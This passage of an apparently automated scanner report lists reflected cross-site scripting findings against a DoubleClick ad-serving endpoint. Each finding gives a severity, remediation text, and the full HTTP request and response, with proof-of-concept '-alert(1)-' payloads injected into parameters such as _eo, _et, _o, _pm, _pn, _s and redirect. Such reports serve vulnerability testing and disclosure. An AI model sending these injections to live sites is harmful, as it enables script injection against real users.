Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:19:56 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
07-300/250%3B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229bbe36'-alert(1)-'583b7cb77ec&_c=17169178&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3965298" target="_blank">
...[SNIP]...

1.53. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_eo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 708c8'-alert(1)-'68bf9185ea8 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956708c8'-alert(1)-'68bf9185ea8&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:17:42 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
f/d3/%2a/x%3B242474299%3B0-0%3B0%3B65365865%3B4307-300/250%3B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956708c8'-alert(1)-'68bf9185ea8&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3831517" target="_blank">
...[SNIP]...

1.54. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_et parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88478'-alert(1)-'cd68f8a5b was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=130922735088478'-alert(1)-'cd68f8a5b&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1980
Date: Tue, 28 Jun 2011 02:18:15 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
2474299%3B0-0%3B0%3B65365865%3B4307-300/250%3B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=130922735088478'-alert(1)-'cd68f8a5b&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3865002" target="_blank">
...[SNIP]...

1.55. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22a18'-alert(1)-'99b4bb5bd72 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=1716917522a18'-alert(1)-'99b4bb5bd72&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:17:08 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
3Dv8/3b34/f/d3/%2a/x%3B242474299%3B0-0%3B0%3B65365865%3B4307-300/250%3B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=1716917522a18'-alert(1)-'99b4bb5bd72&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3797861" target="_blank">
...[SNIP]...

1.56. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_pm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9639'-alert(1)-'96a1af39904 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956e9639'-alert(1)-'96a1af39904&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:21:03 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956e9639'-alert(1)-'96a1af39904&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/4032189" target="_blank">
...[SNIP]...

1.57. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_pn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfdeb'-alert(1)-'000ca2f821b was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677cfdeb'-alert(1)-'000ca2f821b&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:21:36 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
u%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677cfdeb'-alert(1)-'000ca2f821b&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/4065736" target="_blank">
...[SNIP]...

1.58. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d6cb'-alert(1)-'6f19826f6fc was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=116831d6cb'-alert(1)-'6f19826f6fc&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:19:22 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
5365865%3B4307-300/250%3B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=116831d6cb'-alert(1)-'6f19826f6fc&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3931861" target="_blank">
...[SNIP]...

1.59. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df183'-alert(1)-'09e6c884d7f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=df183'-alert(1)-'09e6c884d7f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
